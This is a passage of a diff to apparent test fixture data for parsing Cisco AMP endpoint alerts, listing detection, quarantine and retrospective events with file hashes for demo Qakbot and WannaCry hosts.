"Demo_Qakbot_1", + "input.type": "log", + "log.offset": 9463, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6411525251028484105", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 214000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "6894b3834bd541fa85df79e44568acac", + "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 10645, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6411525251028484104", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 183000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "6894b3834bd541fa85df79e44568acac", + "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 12021, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411525251028484104", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 13397, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264043361501262", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14506, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 779000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 15718, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 716000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16930, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264043361501261", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 18142, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419264043361501262", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 706000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 872000000, + "event.action": "Retrospective Detection", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275390665097000, + "event.id": 6419264043361501000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", - "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "file.name": "mssecsvc.exe", - "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "host.os.family": "windows", "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 5147, - "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", - "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", - "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", - "process.name": "lsass.exe", - "process.pid": 708, + "log.offset": 19266, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "db349b97c37d22f5ea1d1841e3c89eb4", - "e889544aff85ffaf8b0d0da705105dee7c97fe26" + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -244,9 +955,6 @@ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -254,49 +962,57 @@ ] }, { - "@timestamp": "2021-01-14T16:59:38.000Z", + "@timestamp": "2021-01-14T16:55:47.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "f9:65:da:22:2a:41" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6411525251028484105", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419264043361501261", + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "f9:65:da:22:2a:41" + "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 698000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 872000000, + "event.action": "Retrospective Detection", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6411525251028484000, + "event.id": 6419264043361501000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "event.severity": 3, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "@WanaDecryptor@.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_1", - "host.name": "Demo_Qakbot_1", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", "input.type": "log", - "log.offset": 9463, + "log.offset": 20509, "related.hash": [ - "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "related.hosts": [ - "Demo_Qakbot_1" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", @@ -309,66 +1025,58 @@ ] }, { - "@timestamp": "2021-01-14T16:59:38.000Z", + "@timestamp": "2021-01-14T16:55:47.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "f9:65:da:22:2a:41" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6411525251028484104", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "f9:65:da:22:2a:41" + "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 183000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 763000000, + "event.action": "Retrospective Detection", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6411525251028484000, + "event.id": 6419264043361501000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "6894b3834bd541fa85df79e44568acac", - "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", - "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", - "file.name": "MspthrdHash.exe", - "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_1", - "host.name": "Demo_Qakbot_1", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", "host.os.family": "windows", "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 12021, + "log.offset": 21869, "related.hash": [ - "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", - "6894b3834bd541fa85df79e44568acac", - "8cf0ca99a8f5019d8583133b9a9379299c45470c" + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "related.hosts": [ - "Demo_Qakbot_1" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -387,10 +1095,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419264043361501262", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -398,9 +1105,10 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 888000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 716000000, + "event.action": "Retrospective Detection", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -409,11 +1117,15 @@ "event.module": "cisco", "event.severity": 3, "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", "input.type": "log", - "log.offset": 14506, + "log.offset": 23112, "related.hash": [ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], @@ -431,7 +1143,7 @@ ] }, { - "@timestamp": "2021-01-14T16:55:47.000Z", + "@timestamp": "2021-01-14T16:55:46.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -442,9 +1154,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419229331435814969", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, "cisco.amp.event_type_id": 2164260893, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -453,24 +1165,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 779000000, + "cisco.amp.timestamp_nanoseconds": 718000000, "event.action": "Retrospective Quarantine Attempt Failed", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419264043361501000, + "event.id": 6419264039066534000, "event.kind": "alert", "event.module": "cisco", "event.severity": 3, - "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 15718, + "log.offset": 24355, "related.hash": [ - "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -486,7 +1198,7 @@ ] }, { - "@timestamp": "2021-01-14T16:55:47.000Z", + "@timestamp": "2021-01-14T16:55:46.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -497,10 +1209,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419204905956802579", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection_id": "6419264039066533964", + "cisco.amp.event_type_id": 553648155, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -508,24 +1218,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 716000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 765000000, + "event.action": "Retrospective Quarantine", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419264043361501000, + "event.id": 6419264039066534000, "event.kind": "alert", "event.module": "cisco", "event.severity": 3, - "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 16930, + "log.offset": 25559, "related.hash": [ - "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -541,7 +1251,7 @@ ] }, { - "@timestamp": "2021-01-14T16:55:47.000Z", + "@timestamp": "2021-01-14T16:55:46.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -552,8 +1262,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419264043361501261", - "cisco.amp.event_type_id": 553648155, + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419264039066533964", + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -561,24 +1272,96 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 888000000, - "event.action": "Retrospective Quarantine", + "cisco.amp.timestamp_nanoseconds": 749000000, + "event.action": "Retrospective Detection", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419264043361501000, + "event.id": 6419264039066534000, "event.kind": "alert", "event.module": "cisco", "event.severity": 3, - "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.hash.md5": "54a116ff80df6e6031059fc3036464df", + "file.hash.sha1": "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", "input.type": "log", - "log.offset": 18142, + "log.offset": 26683, "related.hash": [ - "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "54a116ff80df6e6031059fc3036464df", + "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 702000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "54a116ff80df6e6031059fc3036464df", + "file.hash.sha1": "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 28003, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "54a116ff80df6e6031059fc3036464df", + "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -594,49 +1377,49 @@ ] }, { - "@timestamp": "2021-01-14T16:55:46.000Z", + "@timestamp": "2021-01-14T16:35:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "53:74:31:cb:37:50" + "mac": "02:2f:e0:10:03:5d" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419229322845880359", - "cisco.amp.error.description": "Cannot delete", - "cisco.amp.error.error_code": 3221225761, + "cisco.amp.detection_id": "6412622782676336648", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, 